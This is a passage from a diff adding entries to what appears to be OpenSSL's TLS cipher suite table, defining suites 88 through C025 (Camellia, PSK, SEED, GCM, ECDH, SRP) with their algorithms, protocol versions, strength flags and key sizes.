+     SSL_CAMELLIA256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 88 */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA,
+     TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_CAMELLIA256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher 89 */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_CAMELLIA_256_CBC_SHA,
+     TLS1_CK_ADH_WITH_CAMELLIA_256_CBC_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_CAMELLIA256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+#endif                          /* OPENSSL_NO_CAMELLIA */
+
+#ifndef OPENSSL_NO_PSK
+    /* Cipher 8A */
+    {
+     1,
+     TLS1_TXT_PSK_WITH_RC4_128_SHA,
+     TLS1_CK_PSK_WITH_RC4_128_SHA,
+     SSL_kPSK,
+     SSL_aPSK,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 8B */
+    {
+     1,
+     TLS1_TXT_PSK_WITH_3DES_EDE_CBC_SHA,
+     TLS1_CK_PSK_WITH_3DES_EDE_CBC_SHA,
+     SSL_kPSK,
+     SSL_aPSK,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher 8C */
+    {
+     1,
+     TLS1_TXT_PSK_WITH_AES_128_CBC_SHA,
+     TLS1_CK_PSK_WITH_AES_128_CBC_SHA,
+     SSL_kPSK,
+     SSL_aPSK,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 8D */
+    {
+     1,
+     TLS1_TXT_PSK_WITH_AES_256_CBC_SHA,
+     TLS1_CK_PSK_WITH_AES_256_CBC_SHA,
+     SSL_kPSK,
+     SSL_aPSK,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+#endif                          /* OPENSSL_NO_PSK */
+
+#ifndef OPENSSL_NO_SEED
+    /* SEED ciphersuites from RFC4162 */
+
+    /* Cipher 96 */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_SEED_SHA,
+     TLS1_CK_RSA_WITH_SEED_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_SEED,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 97 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_SEED_SHA,
+     TLS1_CK_DH_DSS_WITH_SEED_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_SEED,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 98 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_SEED_SHA,
+     TLS1_CK_DH_RSA_WITH_SEED_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_SEED,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 99 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_SEED_SHA,
+     TLS1_CK_DHE_DSS_WITH_SEED_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_SEED,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 9A */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_SEED_SHA,
+     TLS1_CK_DHE_RSA_WITH_SEED_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_SEED,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher 9B */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_SEED_SHA,
+     TLS1_CK_ADH_WITH_SEED_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_SEED,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+#endif                          /* OPENSSL_NO_SEED */
+
+    /* GCM ciphersuites from RFC5288 */
+
+    /* Cipher 9C */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_RSA_WITH_AES_128_GCM_SHA256,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher 9D */
+    {
+     1,
+     TLS1_TXT_RSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_RSA_WITH_AES_256_GCM_SHA384,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher 9E */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_DHE_RSA_WITH_AES_128_GCM_SHA256,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher 9F */
+    {
+     1,
+     TLS1_TXT_DHE_RSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_DHE_RSA_WITH_AES_256_GCM_SHA384,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher A0 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_DH_RSA_WITH_AES_128_GCM_SHA256,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher A1 */
+    {
+     1,
+     TLS1_TXT_DH_RSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_DH_RSA_WITH_AES_256_GCM_SHA384,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher A2 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_DHE_DSS_WITH_AES_128_GCM_SHA256,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher A3 */
+    {
+     1,
+     TLS1_TXT_DHE_DSS_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_DHE_DSS_WITH_AES_256_GCM_SHA384,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher A4 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_DH_DSS_WITH_AES_128_GCM_SHA256,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher A5 */
+    {
+     1,
+     TLS1_TXT_DH_DSS_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_DH_DSS_WITH_AES_256_GCM_SHA384,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher A6 */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_ADH_WITH_AES_128_GCM_SHA256,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher A7 */
+    {
+     1,
+     TLS1_TXT_ADH_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_ADH_WITH_AES_256_GCM_SHA384,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+    {
+     1,
+     "SCSV",
+     SSL3_CK_SCSV,
+     0,
+     0,
+     0,
+     0,
+     0,
+     0,
+     0,
+     0,
+     0},
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+    /* Cipher C001 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_NULL_SHA,
+     TLS1_CK_ECDH_ECDSA_WITH_NULL_SHA,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+    /* Cipher C002 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_RC4_128_SHA,
+     TLS1_CK_ECDH_ECDSA_WITH_RC4_128_SHA,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C003 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_DES_192_CBC3_SHA,
+     TLS1_CK_ECDH_ECDSA_WITH_DES_192_CBC3_SHA,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C004 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_AES_128_CBC_SHA,
+     TLS1_CK_ECDH_ECDSA_WITH_AES_128_CBC_SHA,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C005 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_AES_256_CBC_SHA,
+     TLS1_CK_ECDH_ECDSA_WITH_AES_256_CBC_SHA,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher C006 */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_NULL_SHA,
+     TLS1_CK_ECDHE_ECDSA_WITH_NULL_SHA,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+    /* Cipher C007 */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_RC4_128_SHA,
+     TLS1_CK_ECDHE_ECDSA_WITH_RC4_128_SHA,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C008 */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA,
+     TLS1_CK_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C009 */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,
+     TLS1_CK_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C00A */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,
+     TLS1_CK_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher C00B */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_NULL_SHA,
+     TLS1_CK_ECDH_RSA_WITH_NULL_SHA,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+    /* Cipher C00C */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_RC4_128_SHA,
+     TLS1_CK_ECDH_RSA_WITH_RC4_128_SHA,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C00D */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_DES_192_CBC3_SHA,
+     TLS1_CK_ECDH_RSA_WITH_DES_192_CBC3_SHA,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C00E */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_AES_128_CBC_SHA,
+     TLS1_CK_ECDH_RSA_WITH_AES_128_CBC_SHA,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C00F */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_AES_256_CBC_SHA,
+     TLS1_CK_ECDH_RSA_WITH_AES_256_CBC_SHA,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher C010 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_NULL_SHA,
+     TLS1_CK_ECDHE_RSA_WITH_NULL_SHA,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+    /* Cipher C011 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_RC4_128_SHA,
+     TLS1_CK_ECDHE_RSA_WITH_RC4_128_SHA,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C012 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_DES_192_CBC3_SHA,
+     TLS1_CK_ECDHE_RSA_WITH_DES_192_CBC3_SHA,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C013 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_AES_128_CBC_SHA,
+     TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C014 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_AES_256_CBC_SHA,
+     TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher C015 */
+    {
+     1,
+     TLS1_TXT_ECDH_anon_WITH_NULL_SHA,
+     TLS1_CK_ECDH_anon_WITH_NULL_SHA,
+     SSL_kEECDH,
+     SSL_aNULL,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+    /* Cipher C016 */
+    {
+     1,
+     TLS1_TXT_ECDH_anon_WITH_RC4_128_SHA,
+     TLS1_CK_ECDH_anon_WITH_RC4_128_SHA,
+     SSL_kEECDH,
+     SSL_aNULL,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C017 */
+    {
+     1,
+     TLS1_TXT_ECDH_anon_WITH_DES_192_CBC3_SHA,
+     TLS1_CK_ECDH_anon_WITH_DES_192_CBC3_SHA,
+     SSL_kEECDH,
+     SSL_aNULL,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C018 */
+    {
+     1,
+     TLS1_TXT_ECDH_anon_WITH_AES_128_CBC_SHA,
+     TLS1_CK_ECDH_anon_WITH_AES_128_CBC_SHA,
+     SSL_kEECDH,
+     SSL_aNULL,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C019 */
+    {
+     1,
+     TLS1_TXT_ECDH_anon_WITH_AES_256_CBC_SHA,
+     TLS1_CK_ECDH_anon_WITH_AES_256_CBC_SHA,
+     SSL_kEECDH,
+     SSL_aNULL,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+#endif                          /* OPENSSL_NO_ECDH */
+
+#ifndef OPENSSL_NO_SRP
+    /* Cipher C01A */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_WITH_3DES_EDE_CBC_SHA,
+     TLS1_CK_SRP_SHA_WITH_3DES_EDE_CBC_SHA,
+     SSL_kSRP,
+     SSL_aSRP,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C01B */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA,
+     TLS1_CK_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA,
+     SSL_kSRP,
+     SSL_aRSA,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C01C */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA,
+     TLS1_CK_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA,
+     SSL_kSRP,
+     SSL_aDSS,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+    /* Cipher C01D */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_WITH_AES_128_CBC_SHA,
+     TLS1_CK_SRP_SHA_WITH_AES_128_CBC_SHA,
+     SSL_kSRP,
+     SSL_aSRP,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C01E */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_RSA_WITH_AES_128_CBC_SHA,
+     TLS1_CK_SRP_SHA_RSA_WITH_AES_128_CBC_SHA,
+     SSL_kSRP,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C01F */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_DSS_WITH_AES_128_CBC_SHA,
+     TLS1_CK_SRP_SHA_DSS_WITH_AES_128_CBC_SHA,
+     SSL_kSRP,
+     SSL_aDSS,
+     SSL_AES128,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+    /* Cipher C020 */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_WITH_AES_256_CBC_SHA,
+     TLS1_CK_SRP_SHA_WITH_AES_256_CBC_SHA,
+     SSL_kSRP,
+     SSL_aSRP,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher C021 */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_RSA_WITH_AES_256_CBC_SHA,
+     TLS1_CK_SRP_SHA_RSA_WITH_AES_256_CBC_SHA,
+     SSL_kSRP,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+
+    /* Cipher C022 */
+    {
+     1,
+     TLS1_TXT_SRP_SHA_DSS_WITH_AES_256_CBC_SHA,
+     TLS1_CK_SRP_SHA_DSS_WITH_AES_256_CBC_SHA,
+     SSL_kSRP,
+     SSL_aDSS,
+     SSL_AES256,
+     SSL_SHA1,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+#endif                          /* OPENSSL_NO_SRP */
+#ifndef OPENSSL_NO_ECDH
+
+    /* HMAC based TLS v1.2 ciphersuites from RFC5289 */
+
+    /* Cipher C023 */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_SHA256,
+     TLS1_CK_ECDHE_ECDSA_WITH_AES_128_SHA256,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C024 */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_SHA384,
+     TLS1_CK_ECDHE_ECDSA_WITH_AES_256_SHA384,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_AES256,
+     SSL_SHA384,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher C025 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_AES_128_SHA256,
